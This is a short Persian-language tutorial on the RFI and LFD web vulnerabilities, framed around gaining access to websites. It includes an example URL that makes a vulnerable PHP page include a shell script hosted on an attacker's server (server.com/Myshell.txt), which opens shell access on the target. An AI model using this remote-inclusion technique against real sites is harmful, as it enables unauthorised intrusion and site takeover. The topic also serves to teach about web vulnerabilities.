در این مطلب به بررسی دو باگ LFD و RFI میپردازیم که آشنایی با آنها نفوذ به بسیاری از وبسایتها را امکان پذیر میسازد.
باگ RFI (Remote File Incusion ) بسیار مشابه همان باگ LFI است با این تفاوت که در واقع از همان باگ به شکلی دیگر استفاده کنید و به جای فراخوانی فایلها شل اسکریپت آپلود کنیم که نسبتا دسترسی کاملی به سایت خواهیم داشت.
توضیح آن به این صورت است که هکر با دادن لینکی از شل اسکریپت خود که در سروری دیگر آپلود کرده به ورودی سایت آسیب پذیر شل را اجرا میکند و به صورت اسکریپت دسترسی میگیرد. شل حتمی باید با پسوند ( .txt ) باشد.
مثلا آدرس زیر ورودی یک سایت آسیب پذیر است:
http://site.com/index.php?m=site
که به این صورت شل را اجرا میکنیم:
http://site.com/index.php?m=http://server.com/Myshell.txt
در این مثال Server.com آدرس سروری است که فایل را آپلود کردیم و Myshell.txt نام فایل شل اسکریپت که پس از وارد کرد شل اجرا شده و ما دسترس خواهیم داشت.
و مشخصا روش های ایمن سازی این باگ با LFI تفاوتی ندارد.
LFD
باگ LFD (Local File Download/Disclosur ) نیز از خانواده باگ LFI است و هیچ فرقی وجود ندارد و فایل ها با این باگ دانلود میشوند. یعنی اگر فایل ها خوانده شوند باگ LFI است , اگر دانلود شوند LFD و اگر شل اسکریپت اجرا کنید و دسترسی بگیرید باگ RFI است. روش شناسایی اجرا و ایمن سازی این سه باگ باهم تفاوتی ندارند.
Source: Mahdi Ahmadi
